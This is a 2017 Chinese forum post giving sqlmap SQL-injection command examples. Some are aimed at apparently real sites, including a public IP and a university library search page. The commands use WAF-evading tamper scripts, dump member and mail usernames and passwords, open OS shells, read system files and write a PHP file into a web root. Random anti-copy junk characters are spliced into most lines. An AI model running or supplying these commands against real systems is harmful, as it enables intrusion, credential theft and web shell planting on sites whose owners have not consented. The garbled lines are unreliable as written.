找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1665|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap
3 Y* k8 c# y2 _, Y8 @8 q0 e" I9 W  d  ~# S
update :::::>     in the folder   after  execute    following   order : svn update
1 a: {7 f2 l$ ~; H; s$ B# Q! ~& L! S  n8 v% I# ~: Z5 ?
sqlmap.py -r 1.txt --current-db% L2 ~+ W; ~# K' S6 ~& D: E# o* I

' }7 L( m  Y+ j) }0 |: b' n' Q- k5 r9 i# sv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”2 g: t) I. O* K! \

# T6 i- R* k$ G8 x% }0 o+ a! J==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
0 l( b. y1 p/ R' t* Z4 P猜解数据库
5 |9 F4 a: n! l4 a./sqlmap.py -u "injection-url" --dbs- r, A& X( u2 F! H5 O
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
& O; g. u8 z4 H. v
9 W8 f7 Z1 f4 S+ i. V0 `2 |2 D猜解表名
: \* G! A  {& `4 R& Z3 c./sqlmap.py -u "injection-url" -D database_name --tables5 [% n4 y" E. ?  p
3 S: v2 g5 J" S, B) y
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
$ }0 t2 r: [7 z- x" H7 n) N3 jsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
) {2 \8 @! [' m3 K3 F! S) O7 ^
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump) X4 J) S. ]) n
* |/ ]) Z& N) |6 E
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
) V" N0 o3 R2 m% zsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
) F7 x' t2 w( `8 n. Isqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
) u" r1 F0 q% M+ j0 X' Nsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
* Q  b! D8 G) h0 B: @7 l5 J$ i) g; [3 U1 Q) p- e
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
' ?  r+ ]9 F7 o: n& q6 a# i, G. ssqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py") S. ~) I: k+ O& ~' z5 z
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
. n# {$ J! S7 l3 A8 K! isqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
" U  C% n" D7 ]: k0 R  H& u8 C4 Esqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump; i! |) u6 x8 m5 s5 A. a3 T$ H2 r
4 j" \5 z( `* _+ w; n6 q" ^
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了4 B! m" Y, y4 W1 g5 i
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
# z( U4 S  w  j/ l7 k0 q5 ~+ x% c$ c9 r/ }; N8 ]$ S& z
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"7 G, P( e1 R% E+ K: V' c) A
猜解列名
1 @& X" b  t8 b: R, O  m./sqlmap.py -u "injection-url" -D database_name -T table_name --columns  e; P( ?& l6 W4 r

6 J0 w5 `3 L5 r  m5 S' c, Wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 8 u+ j, ^4 z. h. T5 T" E" b
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"   F( b6 @. }; @) g, S) A9 o
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"- ~) N. n, E% z8 S% K

4 }7 C( W0 n+ \6 ~8 ]( g6 Q; vsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"$ ?* U3 |4 q. X* p; q7 o5 _
&submit=Go$ J6 w& u, L# h1 m7 Q
猜解值2 y& b8 F1 T/ b
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump$ k' l' r0 Z1 P- O) v$ a  d! ^
========================================================
; i' f6 B9 g# y' l& w: ~. X$ C搜索表名中包括mana字符的
, p3 _1 C  C/ Y1 Z0 R, P/sqlmap.py -u "injection-url" -T mana --search
% `* L' v  ~( O& ~/ G返回一个交互式sql shell4 G9 w7 h, X  `3 w( p1 E
/sqlmap.py -u "injection-url" --sql-shell
, k2 B! n' [% T' b0 e: z6 r读取指定文件(需权限)
2 ]5 c0 Z" _; r. X+ U/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
9 V3 P( N% Z! [: v查看当前 用户 及 数据库 , `: o) \3 i# P; ?
/sqlmap.py -u "injection-url" --current-user --current-db7 j" U% Z! a/ [! w0 r" T; I
本地文件 写入 远程目标绝对路径
+ t6 x' P9 l+ s; H7 I/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径* D  T6 r! ?  u9 R+ G4 o: n, C9 V8 K8 o
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" " i& o2 E; N. w( C, _! ~+ ^9 a' e

4 P! ?/ Y5 r1 N; q: esqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
1 f  ?' Q/ Z8 c& }% C0 |7 `' y  `查看某用的权限; Y- p% C- ~; m' t. f) V
/sqlmap.py -u "injection-url" --privileges -U root
- A9 v0 ^  S$ F% V# c4 g7 o' x查看当前用户是否为dba
1 s4 @4 R7 k, d5 P; M. p: U/sqlmap.py -u "injection-url" --is-dba
% U! n" g6 o: Y7 ]2 e: r0 f2 M读取所有数据库用户或指定数据库用户的密码6 w- D& d8 a" ^8 e. l9 l* d; L) L  `
sqlmap.py -r 1.txt --users --passwords- g6 f; w% y( V( G. E2 o
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" / ^! f) W7 P( v  T* n% ^' T

1 E2 `; @; O3 y) N$ y/sqlmap.py -u "injection-url" --passwords -U root6 M+ P7 u7 p# m  R3 C3 B
/ ]- N! p1 J7 \' C
--start&&--stop 与 --first&&--last 的区别
& a' W+ q  U5 F  m9 \/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
4 h6 T- C* \  ?4 m
* Y/ W( D/ G6 K: k! C6 B& d& C) s从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
& Z9 X9 G  {! x8 Y! n4 w/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
' I9 z+ M% w- a' `4 t/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
' o! \+ m$ H6 |2 s& O
2 _7 q. t, y9 I  C执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)( ?* a! e0 q% ^( Y/ z
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
6 J! K$ e9 T0 m2 Z1 d( w; k4 E. u" e# [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表